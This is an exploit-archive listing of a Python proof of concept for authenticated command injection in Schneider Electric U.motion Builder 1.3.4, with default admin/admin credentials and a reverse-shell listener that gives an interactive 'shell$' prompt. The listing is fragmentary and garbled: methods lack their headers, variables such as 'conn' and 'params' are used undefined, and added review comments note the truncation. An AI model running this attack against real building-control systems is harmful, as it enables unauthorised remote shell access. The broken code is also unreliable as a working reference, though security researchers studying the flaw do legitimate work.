Exploits / Vulnerability Discovered : 2020-02-03 |
Type : webapps |
Platform : hardware
This exploit / vulnerability proof of concept for Schneider Electric U.motion Builder 1.3.4 (authenticated command injection) is provided for educational purposes only; if you use it, you do so at your own risk and only against systems you are authorised to test.
from __future__ import print_function
import httplib
import urllib
import argparse
import re
import sys
import socket
import threading
import time
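# Command-line interface for the PoC. --target and --src_ip have no sensible
# default and stay required; the rest carry defaults and are therefore
# optional (a required argument with a default never uses that default).
parser = argparse.ArgumentParser(description='PoC')
parser.add_argument('--target', help='IP or hostname of target', required=True)
parser.add_argument('--port', help='TCP port the target app is running on', default='8080')
parser.add_argument('--username', help='username of the u.motion account used to log in', default='admin')
# NOTE(security): a password passed on the command line is visible in process
# listings and shell history on the attacking host; use a throwaway account.
parser.add_argument('--password', help='password of the u.motion account used to log in', default='admin')
parser.add_argument('--command', help='malicious command to run', default='shell')
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)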
class Exploiter(threading.Thread):
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
threading.Thread.__init__(self)
self.target = target
self.port = port
self.timeout = timeout
self.uri = uri
self.body = body
self.headers = headers
self.shell_mode = shell_mode
try:
response = conn.getresponse()
if not self.shell_mode: print(str(response.status) + " " + response.reason)
data = response.read()
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
except socket.timeout:
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
while 1:
comm = raw_input("shell$ ").strip()
if comm == "quit":
conn.close()
sys.exit(0)
if comm != "":
conn.send(comm + " 2>&1" + "\x0a")
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print(data, end="")
if "\x0a" in data: break
except Exception as ex:
print("Could not start listener")
print(ex)
def login(target, port, username, password):
    """POST the login form to the u.motion web application.

    NOTE(review): this listing is truncated. ``params`` and ``headers`` are
    never defined in the visible text (the lines that build the login form
    from ``username``/``password`` are missing), and nothing parses a session
    id or login seed out of ``data`` even though the caller unpacks
    ``sess_id, login_seed = login(...)``. As shown, every path returns None,
    which would make that unpacking raise TypeError before the caller's
    None check is reached.
    """
    # Credentials travel over plain HTTP, so anyone on the path can read them.
    uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
    try:
        # No timeout is passed to HTTPConnection here; the socket.timeout
        # handler below only fires if a default socket timeout is set
        # elsewhere in the script (not visible in this listing).
        conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
        # The absolute URL is used as the request target; httplib sends it
        # through unchanged.
        conn.request("POST", uri, params, headers)
        response = conn.getresponse()
        print(str(response.status) + " " + response.reason)
        # Read so the connection is drained; the body is not used in the
        # visible code.
        data = response.read()
    except socket.timeout:
        print("Connection timeout while logging in. Check if the server is available")
        return
content_type, body = encode_multipart_formdata(fields, files)
if not shell_mode or (shell_mode and listener and listener.isAlive()):
print('Logging in ...')
sess_id, login_seed = login(target, port, username, password)
if sess_id is None or login_seed is None:
print('Error while logging in')
return